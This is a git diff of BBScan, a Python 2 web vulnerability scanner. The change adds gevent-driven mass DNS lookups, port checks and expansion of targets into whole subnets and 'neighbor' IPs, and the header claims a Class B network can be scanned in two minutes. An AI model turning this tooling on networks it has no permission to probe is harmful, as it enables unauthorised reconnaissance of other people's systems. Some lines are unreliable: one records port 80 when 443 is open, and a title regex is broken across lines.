diff --git a/.gitignore b/.gitignore
index 700bf6f..61570c1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,8 +2,8 @@
__pycache__/
*.py[cod]
-# C extensions
-*.so
+tests/
+temp/
# Distribution / packaging
.Python
diff --git a/BBScan.py b/BBScan.py
index 2f9f220..16cb279 100644
--- a/BBScan.py
+++ b/BBScan.py
@@ -1,51 +1,43 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
-# A vulnerability scanner focus on scanning large number of targets in short time with a minimal set of rules.
-# LiJieJie my[at]lijiejie.com http://www.lijiejie.com
+# A fast vulnerability scanner
+# Simple script scan for a Class B Network (65534 hosts) could be processed within 2 minutes
+# LiJieJie my[at]lijiejie.com http://www.lijiejie.com
import Queue
-import logging
import re
import threading
from bs4 import BeautifulSoup
import multiprocessing
import time
-from string import Template
import glob
import ipaddress
import os
-import webbrowser
import socket
-import sys
import ssl
-import codecs
import traceback
-import struct
import importlib
import signal
-from lib.common import parse_url, decode_response_text, cal_depth, get_domain_sub, escape
+import requests
+import urllib3
+import urlparse
+import gevent
+from gevent import socket as g_socket
+from lib.common import clear_queue, parse_url, decode_response_text, cal_depth, get_domain_sub, \
+ is_port_open, scan_given_ports
from lib.cmdline import parse_args
-from lib.report import template
+from lib.report import save_report
from lib.connectionPool import HTTPConnPool, HTTPSConnPool
+from lib import config
+
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
-socket.setdefaulttimeout(30)
-
-USER_AGENT = 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 BBScan/1.4'
-HEADERS = {'User-Agent': USER_AGENT, 'Connection': 'Keep-Alive', 'Range': 'bytes=0-102400'}
-
-
-# print msg with multi-process shared lock
-def print_msg(msg):
- global_lock.acquire()
- print '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), msg)
- global_lock.release()
-
class Scanner(object):
- def __init__(self, timeout=600, args=None):
+ def __init__(self, q_results, timeout=600, args=None):
+ self.q_results = q_results
self.args = args
self.start_time = time.time()
self.time_out = timeout
@@ -55,8 +47,8 @@ def __init__(self, timeout=600, args=None):
self._init_scripts()
self.url_queue = Queue.Queue() # all urls to scan
- self.urls_processed = set() # processed urls
- self.urls_enqueued = set() # entered queue urls
+ self.urls_processed = set() # processed urls
+ self.urls_enqueued = set() # entered queue urls
self.urls_crawled = set()
self.lock = threading.Lock()
@@ -65,14 +57,20 @@ def __init__(self, timeout=600, args=None):
self._404_status = -1
self.conn_pool = None
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
- self.url = ''
- self.schema, self.host, self.port, self.path = None, None, None, None
- self.domain_sub = self.base_url = ''
- self.has_status_404 = True
+ self.scheme, self.host, self.port, self.path = None, None, None, None
+ self.domain_sub = ''
+ self.base_url = ''
self.max_depth = 0
self.len_404_doc = 0
+ self.has_http = None
+ self.ports_open = None
+ self.ports_closed = None
+ self.no_scripts = None
+ self.status_502_count = 0
+
+ def print_msg(self, msg):
+ self.q_results.put(msg)
- # reset scanner
def reset_scanner(self):
self.start_time = time.time()
self.url_queue.queue.clear()
@@ -84,105 +82,110 @@ def reset_scanner(self):
self._404_status = -1
self.conn_pool = None
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
+ self.scheme, self.host, self.port, self.path = None, None, None, None
+ self.domain_sub = ''
+ self.base_url = ''
+ self.status_502_count = 0
# scan from a given URL
- def init_from_url(self, url):
+ def init_from_url(self, target):
self.reset_scanner()
- self.url = 'http://' + url if url.find('://') < 0 else url
- self.schema, self.host, self.path = parse_url(url)
+ self.scheme = target['scheme']
+ self.host = target['host']
+ self.port = target['port']
+ self.path = target['path']
+ self.has_http = target['has_http']
+ self.ports_open = target['ports_open']
+ self.ports_closed = target['ports_closed']
+ self.no_scripts = target['no_scripts'] if 'no_scripts' in target else 0
self.domain_sub = get_domain_sub(self.host)
self.init_final()
+ return True
def init_from_log_file(self, log_file):
self.reset_scanner()
self.log_file = log_file
- self.schema, self.host, self.path = self._parse_url_from_file()
+ self.scheme, self.host, self.path = self._parse_url_from_file()
self.domain_sub = get_domain_sub(self.host)
if self.host:
- self.load_all_urls_from_log_file()
+ if self.host.find(':') > 0:
+ _ret = self.host.split(':')
+ self.host = _ret[0]
+ self.port = _ret[1]
+ elif self.scheme == 'https':
+ self.port = 443
+ elif self.scheme == 'http':
+ self.port = 80
+ else:
+ self.port = None
+ if not is_port_open(self.host, self.port):
+ self.print_msg('[Port Not Open] %s:%s' % (self.host, self.port))
+ return False
+ self.has_http = True
+ self.no_scripts = 1
self.init_final()
+ self.load_all_urls_from_log_file()
return True
else:
host = os.path.basename(log_file).replace('.log', '')
try:
socket.gethostbyname(host)
- self.init_from_url(host)
+ self.init_from_url(host) # Fix Me
return True
except Exception as e:
- print_msg('[ERROR] Invalid host from log name: %s' % host)
+ self.print_msg('[ERROR] Invalid host from log name: %s' % host)
return False
- #
def init_final(self):
try:
if self.conn_pool:
self.conn_pool.close()
except Exception as e:
pass
- default_port = 443 if self.schema.lower() == 'https' else 80
- self.host, self.port = self.host.split(':') if self.host.find(':') > 0 else (self.host, default_port)
- self.port = int(self.port)
- if self.schema == 'http' and self.port == 80 or self.schema == 'https' and self.port == 443:
- self.base_url = '%s://%s' % (self.schema, self.host)
+
+ if self.scheme == 'http' and self.port == 80 or self.scheme == 'https' and self.port == 443:
+ self.base_url = '%s://%s' % (self.scheme, self.host)
else:
- self.base_url = '%s://%s:%s' % (self.schema, self.host, self.port)
+ self.base_url = '%s://%s:%s' % (self.scheme, self.host, self.port)
- is_port_open = self.is_port_open()
- if is_port_open:
- if self.schema == 'https':
- self.conn_pool = HTTPSConnPool(self.host, port=self.port, maxsize=self.args.t * 2, headers=HEADERS)
- else:
- self.conn_pool = HTTPConnPool(self.host, port=self.port, maxsize=self.args.t * 2, headers=HEADERS)
- # 301 redirect to https
- status, headers, html_doc = self.http_request('/')
- location = headers.get('Location', '')
- if status == 301 and location.startswith('https://'):
- self.base_url = location.rstrip('/')
- _, loc_host, _ = parse_url(location)
- port = int(loc_host.split(':')[1]) if loc_host.find(':') > 0 else 443
- self.conn_pool = HTTPSConnPool(self.host, port=port, maxsize=self.args.t * 2, headers=HEADERS)
- print_msg('301 redirect: %s' % location)
-
- if self.args.scripts_only or (not is_port_open and not self.args.no_scripts):
- for _ in self.user_scripts:
- self.url_queue.put((_, '/'))
- print_msg('Scan with scripts: %s' % self.host)
- return
+ if self.has_http:
+ self.print_msg('Scan %s' % self.base_url)
+ else:
+ self.print_msg('Scan %s:%s' % (self.host, self.port) if self.port else 'Scan %s' % self.host)
- if not is_port_open:
+ if self.has_http:
+ if self.scheme == 'https':
+ self.conn_pool = HTTPSConnPool(self.host, port=self.port, maxsize=self.args.t,
+ headers=config.default_headers)
+ else:
+ self.conn_pool = HTTPConnPool(self.host, port=self.port, maxsize=self.args.t,
+ headers=config.default_headers)
+ if self.args.require_index_doc:
+ self.crawl('/', do_not_process_links=True)
+
+ if self.no_scripts != 1: # 不是重复目标 80 443 跳转的,不需要重复扫描
+ # 当前目标disable, 或者 全局开启插件扫描
+ if self.args.scripts_only or not self.no_scripts:
+ for _ in self.user_scripts:
+ self.url_queue.put((_, '/'))
+
+ if not self.has_http or self.args.scripts_only: # 未发现HTTP服务 或 只依赖插件扫描
return
self.max_depth = cal_depth(self, self.path)[1] + 5
if self.args.no_check404:
self._404_status = 404
- self.has_status_404 = True
else:
self.check_404_existence()
if self._404_status == -1:
- print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
- elif not self.has_status_404:
- print_msg('[Warning] %s has no HTTP 404.' % self.base_url)
+ self.print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
+ elif self._404_status != 404:
+ self.print_msg('[Warning] %s has no HTTP 404.' % self.base_url)
_path, _depth = cal_depth(self, self.path)
- self.enqueue('/')
- self.enqueue(_path)
- if not self.args.no_crawl and not self.log_file:
- self.crawl(_path)
- def is_port_open(self):
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5.0)
- if s.connect_ex((self.host, int(self.port))) == 0:
- print_msg('scan web: %s:%s' % (self.host, self.port))
- return True
- else:
- print_msg('[Warning] Fail to connect to %s' % self.base_url)
- return False
- except Exception as e:
- return False
- finally:
- s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
- s.close()
+ self.enqueue('/')
+ if _path != '/' and not self.log_file:
+ self.enqueue(_path)
#
def _parse_url_from_file(self):
@@ -195,7 +198,6 @@ def _parse_url_from_file(self):
break
return parse_url(url)
- #
# load urls from rules/*.txt
def _init_rules(self):
self.text_to_find = []
@@ -210,7 +212,9 @@ def _init_rules(self):
p_content_type = re.compile('{type="(.*?)"}')
p_content_type_no = re.compile('{type_no="(.*?)"}')
- for rule_file in glob.glob('rules/*.txt'):
+ _files = self.args.rule_files if self.args.rule_files else glob.glob('rules/*.txt')
+
+ for rule_file in _files:
with open(rule_file, 'r') as infile:
vul_type = os.path.basename(rule_file)[:-4]
for url in infile.xreadlines():
@@ -235,19 +239,19 @@ def _init_rules(self):
if rule not in self.rules_set_root_only:
self.rules_set_root_only.add(rule)
else:
- print_msg('Duplicated root only rule: %s' % str(rule))
+ self.print_msg('Duplicated root only rule: %s' % str(rule))
else:
if rule not in self.rules_set:
self.rules_set.add(rule)
else:
- print_msg('Duplicated rule: %s' % str(rule))
+ self.print_msg('Duplicated rule: %s' % str(rule))
re_text = re.compile('{text="(.*)"}')
re_regex_text = re.compile('{regex_text="(.*)"}')
file_path = 'rules/white.list'
if not os.path.exists(file_path):
- print_msg('[ERROR] File not exist: %s' % file_path)
+ self.print_msg('[ERROR] File not exist: %s' % file_path)
return
for _line in open(file_path):
_line = _line.strip()
@@ -263,7 +267,7 @@ def _init_rules(self):
file_path = 'rules/black.list'
if not os.path.exists(file_path):
- print_msg('[ERROR] File not exist: %s' % file_path)
+ self.print_msg('[ERROR] File not exist: %s' % file_path)
return
for _line in open(file_path):
_line = _line.strip()
@@ -277,29 +281,34 @@ def _init_rules(self):
if _m:
self.regex_to_exclude.append(re.compile(_m.group(1).decode('utf-8', 'ignore')))
- #
def _init_scripts(self):
self.user_scripts = []
- if self.args.no_scripts: # disable user scripts scan
+ if self.args.no_scripts: # 全局禁用插件,无需导入
return
for _script in glob.glob('scripts/*.py'):
- script_name = os.path.basename(_script).replace('.py', '')
+ script_name_origin = os.path.basename(_script)
+ script_name = script_name_origin.replace('.py', '')
+ if self.args.script: # 只导入指定的脚本
+ if script_name not in self.args.script and script_name_origin not in self.args.script:
+ continue
if script_name.startswith('_'):
continue
try:
self.user_scripts.append(importlib.import_module('scripts.%s' % script_name))
except Exception as e:
- print_msg('[ERROR] Fail to load script %s' % script_name)
+ self.print_msg('[ERROR] Fail to load script %s' % script_name)
- #
- def http_request(self, url, headers=HEADERS, timeout=30):
+ def http_request(self, url, headers=config.default_headers, timeout=20):
try:
if not url:
url = '/'
- # print_msg('request %s' % self.base_url + url)
+ if not self.conn_pool:
+ return -1, {}, ''
+ if self.args.debug:
+ self.print_msg('--> %s' % self.base_url + url)
resp = self.conn_pool.urlopen('GET', self.base_url + url,
- headers=headers, redirect=False, timeout=timeout, retries=0)
- status = resp.status
+ headers=headers, assert_same_host=False,
+ redirect=False, timeout=timeout, retries=0)
if resp.headers.get('content-type', '').find('text') >= 0 \
or resp.headers.get('content-type', '').find('html') >= 0 \
or int(resp.headers.get('content-length', '0')) <= 20480: # 1024 * 20
@@ -307,37 +316,55 @@ def http_request(self, url, headers=HEADERS, timeout=30):
else:
html_doc = ''
- return status, resp.headers, html_doc
+ if resp.status == 502: # 502出现3次以上,排除该站点
+ self.status_502_count += 1
+ if self.status_502_count > 3:
+ self.url_queue.queue.clear()
+ try:
+ if self.conn_pool:
+ self.conn_pool.close()
+ except Exception as e:
+ pass
+ self.conn_pool = None
+ # self.print_msg('Website 502: %s' % self.base_url)
+
+ return resp.status, resp.headers, html_doc
+ except urllib3.exceptions.MaxRetryError as e:
+ return -1, {}, ''
+ except TypeError as e:
+ return -1, {}, ''
except Exception as e:
+ self.print_msg(str(e))
return -1, {}, ''
- # check existence of HTTP 404
+ # check existence of status 404
def check_404_existence(self):
try:
try:
self._404_status, _, html_doc = self.http_request('/BBScan-404-existence-check')
except Exception as e:
- print_msg('[Warning] HTTP 404 check failed <%s:%s>' % (self.host, self.port))
+ self.print_msg('[Warning] HTTP 404 check failed: %s' % self.base_url)
self._404_status, _, html_doc = -1, {}, ''
- if self._404_status == 404:
- self.has_status_404 = True
- else:
- self.has_status_404 = False
+ if self._404_status != 404:
self.len_404_doc = len(html_doc)
except Exception as e:
- logging.error('[Check_404] Exception %s %s' % (self.base_url, str(e)))
+ self.print_msg('[Check_404] Exception %s %s' % (self.base_url, str(e)))
#
def enqueue(self, url):
try:
url = str(url)
+ except Exception as e:
+ return False
+ try:
url_pattern = re.sub(r'\d+', '{num}', url)
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.links_limit:
return False
- else:
- self.urls_processed.add(url_pattern)
- # print_msg('Entered Queue: %s' % url)
- self.crawl(url)
+
+ self.urls_processed.add(url_pattern)
+ # self.print_msg('Entered Queue: %s' % url)
+ if not self.args.no_crawl: # no crawl
+ self.crawl(url)
if self._404_status != -1: # valid web service
rule_set_to_process = [self.rules_set, self.rules_set_root_only] if url == '/' else [self.rules_set]
for rule_set in rule_set_to_process:
@@ -358,32 +385,35 @@ def enqueue(self, url):
if self.args.full_scan and url.count('/') >= 2:
self.enqueue('/'.join(url.split('/')[:-2]) + '/') # sub folder enqueue
- for script in self.user_scripts:
- self.url_queue.put((script, url))
+ if url != '/'and not self.no_scripts:
+ for script in self.user_scripts:
+ self.url_queue.put((script, url))
return True
except Exception as e:
- print '[_enqueue.exception] %s' % str(e)
+ self.print_msg('[_enqueue.exception] %s' % str(e))
return False
#
- def crawl(self, path):
+ def crawl(self, path, do_not_process_links=False):
try:
- headers = dict(HEADERS, Range='bytes=0-204800') # allowed size increased to 200 kb
+ # increase body size to 200 KB
+ headers = dict(config.default_headers, Range='bytes=0-204800')
status, headers, html_doc = self.http_request(path, headers=headers)
if path == '/':
self.index_status, self.index_headers, self.index_html_doc = status, headers, html_doc
- if self.index_html_doc:
+ if not self.args.no_crawl and not do_not_process_links and html_doc:
soup = BeautifulSoup(html_doc, "html.parser")
for link in soup.find_all('a'):
url = link.get('href', '').strip()
if url.startswith('..'):
continue
- if not url.startswith('/') and url.find('//') < 0:
+ if not url.startswith('/') and url.find('//') < 0: # relative path
url = path + url
url, depth = cal_depth(self, url)
# print url, depth
if depth <= self.max_depth:
self.enqueue(url)
+ #
ret = self.find_text(html_doc)
if ret:
if '/' not in self.results:
@@ -395,8 +425,7 @@ def crawl(self, path):
self.results['/'].append(_)
except Exception as e:
- print_msg('[crawl Exception] %s %s' % (path, str(e)))
- traceback.print_exc()
+ self.print_msg('[crawl Exception] %s %s' % (path, str(e)))
#
def load_all_urls_from_log_file(self):
@@ -408,7 +437,7 @@ def load_all_urls_from_log_file(self):
url, depth = cal_depth(self, _[1])
self.enqueue(url)
except Exception as e:
- print_msg('[load_all_urls_from_log_file] %s' % str(e))
+ self.print_msg('[load_all_urls_from_log_file] %s' % str(e))
#
def find_text(self, html_doc):
@@ -432,10 +461,10 @@ def find_exclude_text(self, html_doc):
#
def scan_worker(self):
- while self.url_queue.qsize() > 0:
+ while True:
if time.time() - self.start_time > self.time_out:
self.url_queue.queue.clear()
- print_msg('[ERROR] Timed out task: %s' % self.base_url)
+ self.print_msg('[ERROR] Timed out task: %s' % self.base_url)
return
try:
item = self.url_queue.get(timeout=0.1)
@@ -444,9 +473,9 @@ def scan_worker(self):
try:
if len(item) == 2: # Script Scan
check_func = getattr(item[0], 'do_check')
- # print_msg('Begin %s %s' % (os.path.basename(item[0].__file__), item[1]))
+ # self.print_msg('Begin %s %s' % (os.path.basename(item[0].__file__), item[1]))
check_func(self, item[1])
- # print_msg('End %s %s' % (os.path.basename(item[0].__file__), item[1]))
+ # self.print_msg('End %s %s' % (os.path.basename(item[0].__file__), item[1]))
continue
else:
url_description, tag, status_to_match, content_type, content_type_no, root_only, vul_type = item
@@ -459,13 +488,12 @@ def scan_worker(self):
url = url.replace('{sub}', self.domain_sub)
except Exception as e:
- print_msg('[scan_worker.1] %s' % str(e))
- traceback.print_exc()
+ self.print_msg('[scan_worker.1] %s' % str(e))
+ self.print_msg(traceback.format_exc())
continue
if not item or not url:
break
- # print_msg('[%s]' % url.strip())
try:
status, headers, html_doc = self.http_request(url)
cur_content_type = headers.get('content-type', '')
@@ -516,7 +544,7 @@ def scan_worker(self):
m = re.search('
(.*?)', html_doc)
title = m.group(1) if m else ''
self.lock.acquire()
- # print '[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url)
+ # self.print_msg('[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url))
if prefix not in self.results:
self.results[prefix] = []
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title, 'vul_type': vul_type}
@@ -524,7 +552,7 @@ def scan_worker(self):
self.results[prefix].append(_)
self.lock.release()
except Exception as e:
- print_msg('[scan_worker.2][%s] %s' % (url, str(e)))
+ self.print_msg('[scan_worker.2][%s] %s' % (url, str(e)))
traceback.print_exc()
#
@@ -539,228 +567,360 @@ def scan(self, threads=6):
t.join()
for key in self.results.keys():
- if len(self.results[key]) > 5: # Over 5 URLs found under this folder, show first only
+ # Over 5 URLs found under this folder, keep the first one only
+ if len(self.results[key]) > 5:
self.results[key] = self.results[key][:1]
- return self.host, self.results
+ return self.base_url.lstrip('unknown://').rstrip(':None'), self.results
except Exception as e:
- print '[scan exception] %s' % str(e)
+ self.print_msg('[scan exception] %s' % str(e))
self.conn_pool.close()
-def exit_func(sig, frame):
+def exit_func(_sig, _frame):
exit(-1)
-def scan_process(q_targets, q_results, lock, args, target_process_done):
+def scan_process(q_targets, q_results, args, target_process_done):
+ reload(socket)
signal.signal(signal.SIGINT, exit_func)
- try:
- __builtins__['global_lock'] = lock
- except Exception as e:
- pass
- try:
- setattr(__builtins__, 'global_lock', lock)
- except Exception as e:
- pass
-
- s = Scanner(args.timeout * 60, args=args)
+ s = Scanner(q_results, args.timeout * 60, args=args)
while True:
try:
- target = q_targets.get(timeout=0.5)
+ target = q_targets.get(timeout=0.2)
except Exception as e:
if target_process_done.value:
break
else:
continue
- if target['url']:
- s.init_from_url(target['url'])
+ if 'target' in target:
+ ret = s.init_from_url(target['target'])
+ elif 'file' in target:
+ ret = s.init_from_log_file(target['file'])
else:
- s.init_from_log_file(target['file'])
-
- host, results = s.scan(threads=args.t)
- if results:
- q_results.put((host, results))
- lock.acquire()
- for key in results.keys():
- for url in results[key]:
- print ' [+]%s %s' % (' [%s]' % url['status'] if url['status'] else '', url['url'])
- lock.release()
-
-
-def save_report(_q_results, _file):
- start_time = time.time()
-
- a_template = template['markdown'] if args.md else template['html']
- t_general = Template(a_template['general'])
- t_host = Template(a_template['host'])
- t_list_item = Template(a_template['list_item'])
- output_file_suffix = a_template['suffix']
- report_name = '%s_%s%s' % (os.path.basename(_file).lower().replace('.txt', ''),
- time.strftime('%Y%m%d_%H%M%S', time.localtime()),
- output_file_suffix)
-
- html_doc = content = ""
- global STOP_ME
- try:
- while not STOP_ME:
- if _q_results.qsize() == 0:
- time.sleep(0.5)
- continue
-
- while _q_results.qsize() > 0:
- host, results = _q_results.get()
- _str = ""
- for key in results.keys():
- for _ in results[key]:
- _str += t_list_item.substitute(
- {'status': ' [%s]' % _['status'] if _['status'] else '',
- 'url': _['url'],
- 'title': '[%s]' % _['title'] if _['title'] else '',
- 'vul_type': escape(_['vul_type'].replace('_', ' ')) if 'vul_type' in _ else ''}
- )
- _str = t_host.substitute({'host': host, 'list': _str})
- content += _str
+ continue
+
+ if ret:
+ host, results = s.scan(threads=args.t)
+ if results:
+ q_results.put((host, results))
+
+
+def add_target(q_targets, q_results, target, tasks_count, args, is_neighbor=False):
+ if is_neighbor:
+ target['no_scripts'] = 2 # 邻居IP,不启用插件
+ # if args.debug:
+ # q_results.put('New target: %s' % target)
+ q_targets.put({'target': target})
+ if args.save_ports and target['ports_open']:
+ config.ports_saved_to_file = True
+ if not args.ports_file:
+ args.ports_file = open(args.save_ports, 'w')
+ for port in target['ports_open']:
+ args.ports_file.write('%s:%s\n' % (target['host'], port))
+ args.ports_file.flush()
+ tasks_count.value += 1
+
+
+def domain_lookup_check(queue_targets_origin, processed_targets, queue_targets, q_results):
+ """
+ 解析域名,检查域名有效性
+ """
+ while True:
+ try:
+ url = queue_targets_origin.get_nowait()
+ except Queue.Empty as e:
+ break
+ # scheme netloc path
+ if url.find('://') < 0:
+ netloc = url[:url.find('/')] if url.find('/') > 0 else url
+ else:
+ scheme, netloc, path, params, query, fragment = urlparse.urlparse(url, 'http')
- cost_time = time.time() - start_time
- cost_min = int(cost_time / 60)
- cost_min = '%s min' % cost_min if cost_min > 0 else ''
- cost_seconds = '%.2f' % (cost_time % 60)
- html_doc = t_general.substitute(
- {'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': content}
- )
-
- with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
- outFile.write(html_doc)
-
- if html_doc:
- print_msg('Scan report saved to report/%s' % report_name)
- if not args.no_browser:
- webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
+ # host port
+ if netloc.find(':') >= 0:
+ _ = netloc.split(':')
+ host = _[0]
else:
- print_msg('No vulnerabilities found on sites in %s.' % _file)
+ host = netloc
- except Exception as e:
- print_msg('[save_report_thread Exception] %s %s' % (type(e), str(e)))
- sys.exit(-1)
+ try:
+ ip = g_socket.gethostbyname(host)
+ processed_targets.append(ip)
+ queue_targets.put((url, 0))
+ except Exception as e:
+ q_results.put('Invalid domain: %s' % host)
-def domain_lookup():
+def port_scan_check(queue_targets, q_targets, args, q_results, tasks_count):
+ """
+ 检测端口是否开放
+ no_scripts
+ -> null 无限制
+ -> 1 目标重复, 优先级是最高的
+ -> 2 邻居,为节省时间而禁用的
+ """
while True:
try:
- host = queue_hosts.get(timeout=0.1)
+ url, is_neighbor = queue_targets.get_nowait()
except Queue.Empty as e:
break
- _schema, _host, _path = parse_url(host)
try:
- m = re.search(r'\d+\.\d+\.\d+\.\d+', _host.split(':')[0])
- if m:
- q_targets.put({'file': '', 'url': host})
- ips_to_scan.append(m.group(0))
+ # scheme netloc path
+ if url.find('://') < 0:
+ scheme = 'unknown'
+ netloc = url[:url.find('/')] if url.find('/') > 0 else url
+ path = ''
+ else:
+ scheme, netloc, path, params, query, fragment = urlparse.urlparse(url, 'http')
+
+ # host port
+ if netloc.find(':') >= 0:
+ _ = netloc.split(':')
+ host = _[0]
+ port = int(_[1])
+ else:
+ host = netloc
+ port = None
+
+ if scheme == 'https' and port is None:
+ port = 443
+ elif scheme == 'http' and port is None:
+ port = 80
+
+ if scheme == 'unknown':
+ if port == 80:
+ scheme = 'http'
+ if port == 443:
+ scheme = 'https'
+
+ ports_open = set()
+ ports_closed = set()
+
+ # 插件不依赖HTTP连接池 & 仅启用插件扫描, 则不需要检查80/443端口的HTTP服务
+ if args.scripts_only and args.require_no_http:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+ target = {'scheme': scheme, 'host': host, 'port': port, 'path': path,
+ 'has_http': False, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+ continue
+
+ if port:
+ # 标准端口 或 非标准端口
+ has_http = is_port_open(host, port)
+ if has_http:
+ ports_open.add(port)
+ else:
+ ports_closed.add(port)
+ if not args.no_scripts:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+
+ target = {'scheme': scheme, 'host': host, 'port': port, 'path': path, 'has_http': has_http,
+ 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
else:
- ip = socket.gethostbyname(_host.split(':')[0])
- q_targets.put({'file': '', 'url': host})
- ips_to_scan.append(ip)
+ port_open_80 = is_port_open(host, 80)
+ port_open_443 = is_port_open(host, 443)
+ if port_open_80:
+ ports_open.add(80)
+ else:
+ ports_closed.add(80)
+ if port_open_443:
+ ports_open.add(80)
+ else:
+ ports_closed.add(80)
+ if not args.no_scripts:
+ ports_open, ports_closed = scan_given_ports(ports_open, ports_closed, host, args.require_ports)
+
+ if port_open_80 and port_open_443:
+ target = {'scheme': 'https', 'host': host, 'port': 443, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ # 排除 301 http 跳转 https
+ import grequests
+ r = grequests.map([grequests.get('http://%s' % host, allow_redirects=False, timeout=20)])[0]
+ if r and not (r.status_code == 301 and r.headers.get('Location', '').lower().startswith('https')):
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': True, 'no_scripts': 1,
+ 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
+ elif port_open_443:
+ target = {'scheme': 'https', 'host': host, 'port': 443, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ # 即使指定的一些目标,允许插件扫描,邻居也不启用,节省扫描时间
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ elif port_open_80:
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': True, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args, is_neighbor)
+ elif args.no_scripts:
+ # 80 443 端口不开放, 禁用插件扫描
+ q_results.put('No ports open: %s' % host)
+ elif not is_neighbor or args.scripts_only:
+ # 直接输入目标 或者 对邻居应用插件
+ target = {'scheme': 'http', 'host': host, 'port': 80, 'path': path,
+ 'has_http': False, 'ports_open': ports_open, 'ports_closed': ports_closed}
+ add_target(q_targets, q_results, target, tasks_count, args)
+
+ except requests.exceptions.RequestException as e:
+ pass
except Exception as e:
- print e
- print_msg('[Warning] Invalid domain <%s>' % _host.split(':')[0])
-
-
-def process_target():
- global target_process_done
- all_threads = []
- for _ in range(10):
- t = threading.Thread(target=domain_lookup)
- all_threads.append(t)
- t.start()
- for t in all_threads:
- t.join()
+ import traceback
+ q_results.put(traceback.format_exc())
+ q_results.put('[port_scan_check] %s' % str(e))
+
+
+def process_targets(q_targets, args, q_results, queue_targets, tasks_count):
+ # 高并发地解析域名,扫描端口
+ # 高并发执行短时任务
+ # q_results.put('start %s' % time.time())
+ threads = [gevent.spawn(port_scan_check, queue_targets, q_targets, args,
+ q_results, tasks_count) for _ in range(1000)]
+ gevent.joinall(threads)
+ # q_results.put('end %s' % time.time())
+
+
+def prepare_targets(target_list, q_targets, q_results, args, tasks_count, process_targets_done):
+ """
+ 预处理 URL / IP / 域名,端口发现
+ """
+ from gevent.queue import Queue
+ queue_targets_origin = Queue()
+ for target in target_list:
+ if target.strip() and len(target) > 5:
+ # work with https://github.com/lijiejie/subDomainsBrute
+ # Delimiter should be ","
+ hosts = target.replace(',', ' ').strip().split()
+ queue_targets_origin.put(hosts[0])
+
+ processed_targets = []
+ # 将域名解析和端口扫描拆分,可节省约2s
+ # 更简单的做法, 可以将DNS解析和端口扫描合并为一个函数,但那样会损失 2s
+ q_results.put('Domain lookup start.')
+ queue_targets = Queue()
+ threads = [gevent.spawn(domain_lookup_check,
+ queue_targets_origin, processed_targets, queue_targets, q_results) for _ in range(500)]
+ gevent.joinall(threads)
+
if args.network != 32:
- for ip in ips_to_scan:
- if ip.find('/') > 0:
+ q_results.put('Process sub network start.')
+ num_entered_queue = 0
+ for ip in processed_targets:
+ if ip.find('/') > 0: # 网络本身已经处理过
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
- if _network in ips_to_scan:
+ if _network in processed_targets:
continue
- ips_to_scan.append(_network)
- _ips = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()
- for _ip in _ips:
- _ip = str(_ip)
- if _ip not in ips_to_scan:
- ips_to_scan.append(_ip)
- q_targets.put({'file': '', 'url': _ip})
- target_process_done.value = 1
- print_msg('%s targets left to scan' % q_targets.qsize())
+ processed_targets.append(_network)
+
+ if args.network >= 20:
+ sub_nets = [ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()]
+ else:
+ sub_nets = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).subnets(new_prefix=22)
+ for sub_net in sub_nets:
+ if sub_net in processed_targets:
+ continue
+ if type(sub_net) == ipaddress.IPv4Network: # add network only
+ processed_targets.append(str(sub_net))
+ for _ip in sub_net:
+ _ip = str(_ip)
+ if _ip not in processed_targets:
+ queue_targets.put((_ip, 1))
+ num_entered_queue += 1
+ if num_entered_queue > 65535: # 队列不宜太长,如果超过一个B段,分多次处理
+ process_targets(q_targets, args, q_results, queue_targets, tasks_count)
+ num_entered_queue = 0
+ if queue_targets.qsize() > 0: # 还有剩余未处理目标
+ process_targets(q_targets, args, q_results, queue_targets, tasks_count)
+ if args.save_ports and args.ports_file:
+ args.ports_file.close()
+ process_targets_done.value = 1 # 目标导入完成
+ q_results.put('* Targets process all done.')
if __name__ == '__main__':
args = parse_args()
- if args.f:
- input_files = [args.f]
- elif args.d:
- input_files = glob.glob(args.d + '/*.txt')
- elif args.crawler:
- input_files = ['crawler']
- elif args.host:
- input_files = ['hosts'] # several hosts from command line
-
- ips_to_scan = [] # all IPs to scan during current scan
-
